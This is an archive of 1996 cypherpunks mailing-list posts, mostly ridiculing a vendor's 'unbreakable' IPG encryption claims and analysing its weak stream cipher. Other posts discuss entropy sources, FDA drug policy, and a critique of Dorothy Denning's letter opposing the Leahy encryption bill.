>| reference to validation of their product.  Further, IPG is cautioned
>| against using "cypherpunks" as a validation reference, as my
>| subscription to this mailing list could then be construed as
>| contributing to the claim of validation.  This action is intended to
>| guard against claims of the form "roy@sendai.cybrspc.mn.org has been
>| unable to break our system", among others.
>| 
>| Note to IPG: I review all contract offers.  Feel free to contact me for
>| terms, but be advised that I'm somewhat expensive.
>| 
>| Note to c'punks:  apologies for burning listwidth, but this looks like
>| the proper Publication of Record for this notice.
>
>	I'd like to add my name to Roy's letter.  I also received an
>unsoliceted (1700 line) copy of an algorithim.  I do intend to review
>it.  I strongly caution IPG against using my name in their
>advertising.  
>
>Adam
>
>

For my part, I invited them to submit their information to me; 
however, I have to jump on the wagon here and 
also state publicly that this implies no obligation on my part, 
nor my permission to use any information about me in their advertising or other 
material.  Thank you.

geeman@best.com

>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Wed, 20 Mar 1996 16:26:26 +0800
To: Mike McNally <m5@tivoli.com>
Subject: Re: IPG - newest release of the ABC Encryption Algorithms (fwd)
Message-ID: <2.2.32.19960319175044.00c7bab8@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain



>IPG Sales wrote:
>> Obviously, you meet our requirements for the release of the IPG ABC
>> Encryption algorithms. We need no further information from you. though we
>> would appreciate your telephone num and snail mail address.
>

At 08:01 AM 3/19/96 -0600, Mike McNally wrote in reply:
>On the other hand, the "algorithm" as presented is so hopelessly 
>obfuscated by the strange terminology and loose descriptions used
>to present it that there's no way I (or anybody else) could seriously
>evaluate it.  Either publish an algorithm in some accepted format
>(a real C program, or even Knuth notation) or cut back your expectations
>for public analysis.
>

IMPORTANT: I have nothing to do with IPG and I don't endorse their stuff,
I got the same mail and produced the code below to help me figure out
what they are doing. 
                        John

Here is my take on a C version of their code - note that a[] b[] c[] and the
initial d are filled in from the 'one time pad'.  The size of a,b,c is not
specified it could be 8 16 or 32 bits from the text ...  However the initial
values of a,b & c are set using 8 bits of the 'random' key.

int a[64]  /* Random & 0x3500 */
int b[64]  /* Randomly selected primes */
int c[64]  /* randomly selected primes*/
char d;     /* random start value */
int i;

/* the arrays b,c are filled in from tables of smallish primes supplied
by IPG using 'random' numbers supplied by IPG to select the primes (and the
order of same).  since all the values are > 8 bits I've assumed a,b,c = int. 
a[] is filled with 13568 + an 8 bit 'random' number.  (13568 = 0x3500 which
gets ANDed with the seed value)
*/

while(1)
{
        for(i=0; i<64;i++)
        {
                a[i] = (a[i] + b[i]) % c[i];
                d = (d+a[i]) & 0xFF;
                /* output d as next byte in stream */
                /* XOR with plaintext */
        }
}

I would not trust it without spending more time than I have
right now to look at it.  It arrived with the following text:

>The algorithms detailed below are copyrighted 1995 and 1996 by Internet 
>Privacy Guaranteed, Seymour, TX. All rights are reserved. You may not
>provide them to any other party, or parties, by any means or 
>any media, without the expressed written permission of Internet Privacy 
>Guaranteed.

I have not agreed to this, further I strongly suggest IPG add studying trade
secret and copyright law to their todo list.

I do not endorse the above code or algorithm and make no comment on it's
strength or otherwise.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phil G. Fraering" <pgf@srl01.cacs.usl.edu>
Date: Wed, 20 Mar 1996 01:50:09 +0800
To: cypherpunks@toad.com
Subject: nootropic drugs, etc...
Message-ID: <199603191603.AA18735@srl03.cacs.usl.edu>
MIME-Version: 1.0
Content-Type: text/plain


   Path: hks.net!news-mail-gateway!owner-cypherpunks
   From: asgaard@sos.sll.se (Asgaard)

   The reason FDA has not approved this drug is most probably because
   it does not make mildly retarded boys less retarded. But of course,
...

Well, it wasn't until the past year that the FDA approved depakote for
things like bipolar disorder.

It can be prescribed for seizures. Psychiatrists have been prescribing
it to their manic-depressive patients for the past ten years to help
with their "seizures" when the patients have been unable to tolerate
the lithium to treat their "seizures." (Depakote is usually used as
an anticonvulsant.)

I suspect the FDA hasn't ever approved _anything_ as a nootropic.
And I guess the nootropic in question isn't useful for something
else.

Depakote has been known safe and successful for about ten years for
the treatment of bipolar disorder. It's been approved for that for
the last year. If the FDA had been more zealous, they would have
probably forced many people into nine years or so of the progression
of bipolar disorder _or_ lithium toxicity.

   on snake oil. It becomes more difficult to uphold a pure market
   philosophy when it comes to poisonous snake oil or, as is often the
   case with potent drugs, effective oil but which will kill you from
   side effects after a delay. FDA has a very good reputation of not
   'recommending' drugs with (delayed) adverse effects outweighing the
   beneficial ones.

Why not let the patients research the drugs themselves? They'll find out
more than their doctors will ever tell them.

[...]

   Until this happens, trust FDA.

Have you ever stopped and wondered just how many drugs out there cause
birth defects, and asked yourself why thalidomide is illegal and other
drugs are legal?

   Asgaard


Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 19 Mar 1996 23:38:09 +0800
To: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Subject: Re: The return of the IPG Unbreakable System
In-Reply-To: <960319.065439.9K0.rnr.w165w@sendai.cybrspc.mn.org>
Message-ID: <199603191525.KAA05569@homeport.org>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Roy M. Silvernail wrote:

| In list.cypherpunks, ipgsales@cyberstation.net writes:

| Since a copy of the IPG system has apparently arrived unsolicited in my
| mailbox this morning ("apparently" because I haven't unpacked or
| inspected the MIME message; "unsolicited" because I did not request it),
| I believe it's disclaimer time.
| 
| I have entered into no agreements to inspect, test or validate the IPG
| software suite.  In the absence of a valid contract for my services, I
| shall not inspect, test or offer opinions regarding the security of this
| product.  IPG Sales is specificly enjoined from using my nym in any
| reference to validation of their product.  Further, IPG is cautioned
| against using "cypherpunks" as a validation reference, as my
| subscription to this mailing list could then be construed as
| contributing to the claim of validation.  This action is intended to
| guard against claims of the form "roy@sendai.cybrspc.mn.org has been
| unable to break our system", among others.
| 
| Note to IPG: I review all contract offers.  Feel free to contact me for
| terms, but be advised that I'm somewhat expensive.
| 
| Note to c'punks:  apologies for burning listwidth, but this looks like
| the proper Publication of Record for this notice.

	I'd like to add my name to Roy's letter.  I also received an
unsoliceted (1700 line) copy of an algorithim.  I do intend to review
it.  I strongly caution IPG against using my name in their
advertising.  

Adam


- -- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCSAwUBMU7R6N5XP6PQNGpRAQEp+APlHLT35qjhK5buecy5srQg3kQFJ8vce1QR
25GDw5rqK21nT5g8QWKTq0gcWk9EFyFPqKzC8kfPn2BOQ/u7RI3kRHTCGvlOzy0C
X0fqqKgwXVeuYfShZGUmfz6Xeuiia208KJ6ZBkQkaK6o7J9ZKyZEoDob9k75B1ww
HBmVJxc=
=lg/D
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Wed, 20 Mar 1996 16:21:48 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: The return of the IPG Unbreakable System
In-Reply-To: <199603191525.KAA05569@homeport.org>
Message-ID: <314EE23B.36E3@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> | Since a copy of the IPG system has apparently arrived unsolicited in my
> | mailbox this morning...

Me too.

>         I'd like to add my name to Roy's letter.

Oh, uhh, yea; me too.  (I've already sent in a comment concerning the
bizarre process of ANDing 8-bit numbers with 0x3500, but that should
be taken as nothing other than a casual result of my reading the mail;
I've made no commitments or entered into any sort of contractual
agreement.)

> I strongly caution IPG against using my name in their
> advertising.

I am sure that a company with as much Internet savvy as IPG realizes
the degree to which using inappropriate attributions like that could
backfire, given the propensity of some netizens to defend their
reputations through every technological and legal means at their
disposal.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Wed, 20 Mar 1996 02:05:18 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: The return of the IPG Unbreakable System
In-Reply-To: <Pine.BSD/.3.91.960318192022.469B-100000@citrine.cyberstation.net>
Message-ID: <Pine.HPP.3.91.960319110834.9458D-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 18 Mar 1996, IPG Sales wrote:

> 
> Ladies and Gentlemen -
> 
> For the last three plus weeks, some of the members of the C'Punks list 
> have had the IPG algorithms in their possesion. 
> 
> None, to date have suggested that the system is unbreakable - to the 
> contrary a few have stated that they believe it is unbreakable, but do 
> not want to go on the record yet. 
> 
[Lots of Stuff Snipped]

If an IPG fell in a forest and nobody heard it, would it make a sound ?

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Mar 1996 07:45:39 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: The return of the IPG Unbreakable System
In-Reply-To: <Pine.BSD/.3.91.960318192022.469B-100000@citrine.cyberstation.net>
Message-ID: <199603191618.LAA25608@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



IPG Sales writes:
> For the last three plus weeks, some of the members of the C'Punks list 
> have had the IPG algorithms in their possesion. 

You again? Go away. Our snakes are very well oiled already.

.pm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Wed, 20 Mar 1996 09:27:35 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: IPG - newest release of the ABC Encryption Algorithms (fwd)
In-Reply-To: <2.2.32.19960319175044.00c7bab8@mail.software.net>
Message-ID: <314F0DB1.61FE@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


John Pettitt wrote:
> /* the arrays b,c are filled in from tables of smallish primes supplied
> by IPG using 'random' numbers supplied by IPG to select the primes (and the
> order of same).  since all the values are > 8 bits I've assumed a,b,c = int.
> a[] is filled with 13568 + an 8 bit 'random' number.  (13568 = 0x3500 which
> gets ANDed with the seed value)
> */

One tangerine-flavord Starburst to the first cypherpunk who can give
a rough estimate for the results of the sub-expression:

	(random() & 0xff) & 0x3500


______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 20 Mar 1996 08:50:54 +0800
To: cypherpunks@toad.com
Subject: Re: The return of the IPG Unbreakable System
Message-ID: <199603191924.OAA25750@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

No copy of this program has arrived in my mailbox, which is a good thing.
I am no cryptography expert. Even _I_, however, see massive problems in
letting _others_ generate my crypto-keys for me. If this egomaniac gets
the respected experts on this list to review his software at no cost, &
if the experts actually say, "he's right, it's unbreakable," the system
will still have this weakness. This is even worse than the "Power One
Time Pad" snakeoil. Am I missing something?
JMR

Regards, Jim Ray <liberty@gate.net> 
"The era of big government is over." -- Bill Clinton
"Prepare for the era of _HUGE_ government." -- Jim Ray
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35   --   http://www.shopmiami.com/prs/jimray
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMU8JKW1lp8bpvW01AQFK2gQAlxTZlfC9Dwx6nbbliSMxYqMp9Uvf9y0r
ntFZfobQQ4OZsX0cNGDYIvwWMDztV+07d/seEqqEnGVvk8yFqcKPuFIo/WyFqxEc
TqDzCp/i1XtndHDrfJb4hZDgizJKHXXrHO2dfuTecxS9uTgFvT3bUuTOfJme2hOx
DNZz/Sm5rfs=
=SaSo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@aa.net (Brian C. Lane)
Date: Wed, 20 Mar 1996 01:30:01 +0800
To: JonWienke@aol.com
Subject: Re: entropy masking (was Re: Multiple spinners as sources of entropy?)
In-Reply-To: <960313234757_350663563@emout09.mail.aol.com>
Message-ID: <314ed684.1241017@mail.aa.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Mar 1996 23:47:58 -0500, you wrote:

>In DOS, the keyboard, mouse, and disk drives run on interrupts, not timers.
> If you use a timer as a spinner, such as the Windows GetCurrentTime()
>function, (I MSec. resolution) and check its value each time a key is pressed

[...]

  I'd also recommend using mouse clicks. I think that most windows users
(going from personal experience) spend much more time clicking through
messages than typingon the keyboard. A combination of several events should
provide 'even better' randomness.

   Brian


------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> -------
  Embedded Systems Programmer, EET Student, Interactive Fiction author (RSN!)
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Fulbright <100022.3167@compuserve.com>
Date: Wed, 20 Mar 1996 16:20:08 +0800
To: BlindCopyReceiver:;
Subject: Mr Emmett Page, Asst. Sect. Defense, CCCI
Message-ID: <960319215351_100022.3167_EHV88-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


I think you or someone here recently remarked  the U.S.Government has the only
_real_ capability to wage world  terrorism on the internet, and after I read
Frank Sowa's  feb. Boardwatch article I'm beginning to wonder.   I suppose
quoting the article at length will be at least as good as some of the other
traffic around here... just in case anybody missed it, Sowa reviewed 35 federal
reports, and quotes Page saying "As a result, we've had no choice but to create
an offensive capability in cyberspace.  I can't discuss it ... However, you'd
feel good and feel safe and secure if you knew about it"  (yeah, really)
Further, Sowa reports the Natl Defense U is forming an elite Information Corps,
'a F0rce whose scope is to fight the battles of "Information Warfare from the
Pentagon war room to the home PCs" according to DOD' (p90-92).... And further,
RAND corp is using an "all out cyberwar simulator at their research center in
Santa Monica" and... oh well,  the whole article is just crammed with stuff!
Yikes!   I would sure like to know what people think about it. thanks.
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yiorgos Adamopoulos <Y.Adamopoulos@noc.ntua.gr>
Date: Wed, 20 Mar 1996 10:14:55 +0800
To: edgar@Garg.Campbell.CA.US (Edgar Swank)
Subject: Re: Request for reference info + Possible job offer
In-Reply-To: <Zs91kD2w165w@Garg.Campbell.CA.US>
Message-ID: <199603191636.SAA15939@noc.ntua.gr>
MIME-Version: 1.0
Content-Type: text/plain


> I would like people to send me (pointers to) reference information on
> how to write WinSock-compliant client software.  Also tools required,

have a look at http://www.sockets.com and at the book it says.
-- 
 Yiorgos Adamopoulos        adamo@noc.ntua.gr
 National Technical University of Athens, NOC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Wed, 20 Mar 1996 16:20:45 +0800
To: Mike McNally <m5@tivoli.com>
Subject: Re: IPG - newest release of the ABC Encryption Algorithms (fwd)
In-Reply-To: <314F0DB1.61FE@tivoli.com>
Message-ID: <199603200542.VAA01082@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: Mike McNally <m5@tivoli.com>]
[cc: cypherpunks@toad.com]
[Subject: Re: IPG - newest release of the ABC Encryption Algorithms (fwd) ]
[In-reply-to: Your message of Tue, 19 Mar 96 13:40:33 CST.]
             <314F0DB1.61FE@tivoli.com> 

Mike McNally <m5@tivoli.com> Scribed:
>John Pettitt wrote:
>> /* the arrays b,c are filled in from tables of smallish primes supplied
>> by IPG using 'random' numbers supplied by IPG to select the primes (and the
>> order of same).  since all the values are > 8 bits I've assumed a,b,c = int
 .
>> a[] is filled with 13568 + an 8 bit 'random' number.  (13568 = 0x3500 which
>> gets ANDed with the seed value)
>> */

>One tangerine-flavord Starburst to the first cypherpunk who can give
>a rough estimate for the results of the sub-expression:
>	(random() & 0xff) & 0x3500

Well, actually, it depends on whether the bytes are treated as signed or
unsigned, and we don't know for sure that IPG wanted them treated as
unsigned. This means IPG either:

a) can't write portable code, or
b) really are as stupid as we are giving them credit for.

(I'm miffed at being left out of the game... sniff...)

Chris

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMU86OoHskC9sh/+lAQExRQQAs97CBv/HdJwqarKVIZeVOr49xqLjeqbT
RHaaFb1otqh0iH0twRcyqXoaDfTeSyZZZK/pPCWHqiWmPME8NoVzQY9hW86GxKKO
8bxfDjKL6VH2By08fpGxNqBVLUuqNX19rNpreZtcDTxU5ttD8Rz9vA/654opjPDt
2UToOsmNMcw=
=t1pT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@vishnu.alias.net (Mr. Boffo)
Date: Wed, 20 Mar 1996 14:52:54 +0800
To: ipgsales@cyberstation.net
Subject: No Subject
Message-ID: <199603200345.VAA00644@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


ipgsales@cyberstation.net wrote:

>Those of you who have had all of the materials will understand the 
>foregoing. With the information provided heretofore, you can determine  
>the effect on the other two systems. Also, those people will know my 
>expressed fear of a premature announcement, such as that which has 
>now been made, would have. This was the reason, that I resisted 
>so strongly the release of the materials to the C'punks list 
>though a few of you recommended that I do so. Perhaps we should have 
>released everything? Who knows. However, in any case, that is water
>over the dam and IPG must go on from here. It is only another of the many 
>mistakes that we will undoubtedly make along the way. 
>
>Having said that though, we must go back to our prior 
>evaluation method, a strict confidential mode. However, I believe that we 
>have added several very good additional people who can help to analyze 
>the system.

English translation:

We didn't want to release our algorithm because we were afraid
somebody might find a weakness.  Sure enough, somebody did.
So I guess we're going to keep it a secret after all.

Hey, kids, security through obscurity just doesn't work.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Wed, 20 Mar 1996 16:42:29 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: The return of the IPG Unbreakable System (fwd)
In-Reply-To: <Pine.BSD/.3.91.960319162822.11284G-100000@citrine.cyberstation.net>
Message-ID: <199603200621.WAA04585@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: IPG Sales <ipgsales@cyberstation.net>]
[Cc: cypherpunks@toad.com]
[Subject: Re: The return of the IPG Unbreakable System (fwd) ]
[In-reply-to: Your message of Tue, 19 Mar 96 19:24:42 CST.]
             <Pine.BSD/.3.91.960319162822.11284G-100000@citrine.cyberstation.net> 

IPG sales ranted:
>Note: There was one error in the description, that is 13568 ANDed to the 
>8 bit random seed to get starting A values, it is not a C word AND but 
>the assembly langauge sequnce of moving successive AL values into AX, 
>where AH is fixed at 35, thus the effect is the same as an add, 
>(or a byte AND of the random charcter to a zero AL) - the result is 
>a number in the range of 13,568 to 13,823.

Your world-beater algorithm is coded in 286 assembler???

Give up now. Your reputation capital has gone through 0 and is now
negative, and I don't think the Universe can tolerate this situation.

>Accordingly, this will be the last letter posted to the entire 
>cypherpunks list for the time being. If any reader posts something to the 
>entire Cypherpunks list, do not expect any response to from IPG, there 
>will be none.

Yayyyy!!!

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMU99ZoHskC9sh/+lAQFa7wQAt2s9yOknvE9nBk3agFlXJYGyTV2ZpZuf
gxrOb35ZV03xZPhHWvqPPv3pFgDTC0O3FBW7IULrIcTpJzZ/ULNcOwpQMEhaRjVo
JZ8dud3GUPKU3ses92pBK0MIA2ydDeayXGMXrlFAX3ebF+32VekYZzJzaOFz8KfY
aX9bvGoQYqE=
=tQdN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 20 Mar 1996 14:57:18 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Would the FTC crack down on snake oil someday?
Message-ID: <199603200412.XAA11193@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 19 Mar 96 at 19:10, Bill Stewart wrote:

> Sure, they'll be happy to, if we really want.  The NSA will advise them
> on what's good crypto, and what's snake-oil.  Certainly any system that
> didn't provide for back-up key access doesn't rate......
> 
> No, I didn't think you wanted that either....

Maybe the NSA will advise them, maybe not... since there is a 
conflict of interest (not unusual in regulatory circumstances, 
though).

Then again, it would be awkward if the NSA hypothetically said 
product A is crap and product B is secure but non-NSA people said 
differently, esp. if the NSA wouldn't let product A be exported.

They're a governmental organization, with all the flaws of any 
organization/bureaucracy, let alone the government.  So yes, I've
pondered them asking the NSA for advice... but keep in mind it puts
the NSA in a double-bind, because they aren't the only experts, and
because they'll look bad if they contradict themselves.

They (FTC) might go by something different, though. If a company claims 
their product uses an "unbreakable cipher" when there are cracking 
programs (commercial or free) available, then obviously its false 
advertising.  Indeed anything that advertises itself as "unbreakable" 
is a lie.

There's also other consumer groups that are non-governmental, like 
Consumer Reports, PIRGs, and even various state and county consumer 
advoctates who won't tow the federal line (look at bovine growth 
hormone for one example... hm, maybe a bad parallel.)

Part of it is a public learning curve. After a while more people 
(though not enough to eliminate snake oil's market) will recognize 
"PGP", "RSA", 'IDEA", "3DES" and other strong algorithms. (Ascom Tech 
could do themselves a nice turn by pushing for products with "IDEA 
Inside" type of messages...)

Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 20 Mar 1996 18:23:49 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Dorothy Denning attacks Leahy's crypto bill
Message-ID: <m0tzIxu-0008yqC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:45 PM 3/19/96 -0800, Declan McCullagh wrote:
>I may have to adjust my position on Leahy's bill. Any legislation that
>Dorothy Denning attacks so virulently must be worth passing. 


That position would be a serious mistake.  Denning knows that she is a 
negative barometer:  Her position will be looked on with contempt by most of 
us.  That, ironically, makes her "useful" to the government should they want 
to sneak one past us.  I think we've already established that this bill 
sucks, although it could become good with major repairs.  Problem is, 
nothing that Denning wants to do to the bill constitutes an improvement, 
except not passing it in the first place!

-----------------------------------------------------------------

>
>Date: Tue, 19 Mar 96 14:53:35 EST
>From: denning@cs.cosc.georgetown.edu (Dorothy Denning)
>To: farber@central.cis.upenn.edu
>                                                   March 14, 1996
>                                        
>The Honorable Patrick Leahy
>United States Senate
>Russell Building, Room 433
>1st and C Streets, NE
>Washington, DC 20510
>
>Dear Senator Leahy:
>
>As author, scholar, lecturer, researcher, and consultant to the
>government and industry in cryptography and information security, I am
>concerned that S.1587, the "Encrypted Communications Privacy Act of
>1996," is not in balance with society's needs.  By removing practically
>all export controls on encryption, the bill will make it far easier for
>criminals, terrorists, and foreign adversaries to obtain and use
>encryption that is impenetrable by our government.

"Far easier"?  That's an odd statement, because the export of encryption is 
easy with or without restrictive laws.  How much trouble is a "criminal or 
terrorist" going to risk by violating a few measly export laws?  Besides, 
Denning hasn't established that encryption will be any better inside the 
country than without; this means that export controls will have no effect 
even in the most optimistic scenario.

>The likely effect
>will be to erode the ability of our law enforcement and intelligence
>agencies to carry out their missions. 

Since when is this news?  Freedom costs.  But it also pays.

> This is not consistent with your
>own findings in the bill which recognize the need for a "national
>encryption policy that advances the development of the national and
>global information infrastructure, and preserves Americans' right to
>privacy and the Nation's public safety and national security."
>
>I am concerned that the proposed legislation responds only to a loud
>cry for assistance and is not the reasoned and practiced position of
>our multinational corporations.

Of what significance is the "practised position of our multinational 
corporations"?  They'd sell us out if it preserved THEIR rights.  I'm more 
concerned with the rights of the individual.


> At the International Cryptography
>Institute, which I chaired in September 1994 and 1995, our discussions
>did not find that this unrestricted distribution of encryption
>technology was required to satisfy business objectives. 


Notice that we've already established that this bill in no way produces an 
"unrestriction distribution of encryption technology."  Wish it did, but it 
doesn't.


[much Denning-crap deleted]


>The Commerce/NSA study did acknowledge that the existence of foreign
>products claiming strong encryption could have a negative effect on
>U.S. competitiveness.  However, by allowing encryption services to be
>sold separately from the applications software that uses them, CAPIs
>will make it extremely unlikely that general-purpose software will be
>substantially effected by export controls.

That's odd.  Most people around here seem to be of the opposite opinion:  
CAPI's seem to be used by the government to justify controls even on 
software that has no encryption capability.


  Even security-specific
>products, which are a growing industry, can use CAPIs to separate out
>the encryption component from the main product (e.g., firewall).
>Moreover, if keys can be held in other countries under appropriate
>bilateral agreements as noted earlier, export controls need not
>substantially impact encryption products.

Notice that she seems to be making policy for the government, yet again.


>
>Export controls are often blamed for the lack of security in our public
>infrastructure.  The Commerce/NSA study found "little evidence that
>U.S. export controls have had a negative effect on the availability of
>products in the U.S. marketplace," although they "may have hindered
>incorporation of strong encryption algorithms in some domestic
>mass-market, general-purpose products."  There are many factors which
>have played an even larger role in the general lack of security we find
>on the Internet: the high cost and low demand for security, the
>difficulty of designing systems that are secure, pressure to bring new
>products to market before their security implications are understood,
>the willingness of users to take risks in favor of acquiring new tools
>and services, and lack of a public key infrastructure to support
>encryption on a national and international basis.  Many systems are so
>riddled with security holes that any would-be attacker can gain access
>to the system itself, and from there access to plaintext data and
>keys.  Malicious code can be injected into a victim's system through
>electronic mail, documents, images, and web browsers; once there, it
>can transmit sensitive data back to its owner.  Keyboard sniffers can
>capture a user's keystrokes before they are ever encrypted.  Thus,
>while export controls have played a part in the slow integration of
>strong encryption into software and systems, they are not responsible
>for most of the security vulnerabilities we see today.  Moreover, most
>of these vulnerabilities are remedied with non-cryptographic controls
>(e.g., process confinement, trusted systems engineering, biometrics,
>and location-based authentication) or with cryptographic techniques for
>authentication, data integrity, and non-repudiation, which are exempt
>from State Department export controls.  I do not mean to suggest that
>encryption is not important.  In fact, it is essential to protect
>against certain threats.  However, it must be kept in perspective.  The
>use of encryption for confidentiality protection is but one small,
>albeit important, piece of an information security program.
>
>The provisions is S.1587 regarding trusted key holders could have the
>benefit of increasing public trust in key holders.  However, I have
>some concern that the current provisions may be overly restrictive.
>Thus far, we have practically no experience with the operation of third
>party key holders and the circumstances under which they will be called
>upon to provide keys or decryption assistance.  It will be extremely
>important that the provisions allow enough flexibility to accommodate
>legitimate use of the data recovery services of key holders for
>criminal investigations, civil litigation, and intelligence
>operations.  The liability risks to key holders should not be onerous.
>The definition of key holder and exact wording in the bill may also
>need some refinement in order to accommodate existing and proposed
>methods of trusted third party encryption.
>
>Encryption policy is a difficult and often emotional issue. 

It's only emotional because of malicious and counter-productive efforts by 
government, and government suck-ups like Denning.

 It is
>important that Congress work closely with the Administration, industry,
>and other interested parties to develop the best legislative strategy
>for promoting information security on the national and global
>information infrastructure without diminishing the ability of our law
>enforcement and intelligence agencies to protect the public safety and
>national security.  Export liberalization should proceed cautiously,
>tied to key escrow or other methods that accommodate the needs of the
>government as well as those of users and industry.  The
>Administration's plans to liberalize export controls on software key
>escrow is a good next step.  As trust and confidence in key escrow
>grows, the export of virtually unlimited strength encryption systems
>may be possible.  Because export controls are our only lever for
>controlling the spread of encryption, they should be used to their full
>advantage.  Decisions to liberalize these controls must be fully
>informed by classified national security information as well as by
>economic analysis and market studies.
>
>Law enforcement agencies are encountering encryption with ever greater
>frequency. 

Excellent!  It means they're being held back!

> Within a few years, the successful execution of practically
>all court-ordered intercepts and searches and seizures is likely to
>depend on their ability to decrypt communications and stored
>information.  If the encryption cannot be broken, it could be
>impossible to successfully investigate or prosecute those cases.

Bullshit!


[more Denning-shit deleted]

>I will be pleased to meet with you and the committee for comment and
>questioning, or to assist in any way I can with the development of a
>balanced approach to encryption legislation.
>
>Yours respectfully,
>
>Dr. Dorothy E. Denning
>Professor of Computer Sciences
>Georgetown University
>denning@cs.georgetown.edu
>http://www.cosc.georgetown.edu/~denning


I refuse to be used by Denning.  If we make the mistake of supporting this 
bill merely because she claims to oppose it, we would merely be falling into 
her (and the government's) trap.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Wed, 20 Mar 1996 19:34:17 +0800
To: cypherpunks@toad.com
Subject: Re: The return of the IPG Unbreakable System (fwd)
In-Reply-To: <199603200620.WAA04433@eternity.c2.org>
Message-ID: <199603200934.BAA11847@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: cypherpunks@toad.com]
[Subject: Re: The return of the IPG Unbreakable System (fwd) ]
[In-reply-to: Your message of Tue, 19 Mar 96 22:20:07 PST.]
             <199603200620.WAA04433@eternity.c2.org> 

>-----BEGIN PGP SIGNED MESSAGE-----

I wrote once, I mean that I only once wrote:
>[To: IPG Sales <ipgsales@cyberstation.net>]
>[the rest deleted]

Something at c2 must have burped. I definitely only sent it once.
Anyway, sorry about that. I wonder if the same thing will happen to
this?

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMU/Ko4HskC9sh/+lAQGK+wP/UR7eANspnegDEW5Bfht3cERUXt4XeTIR
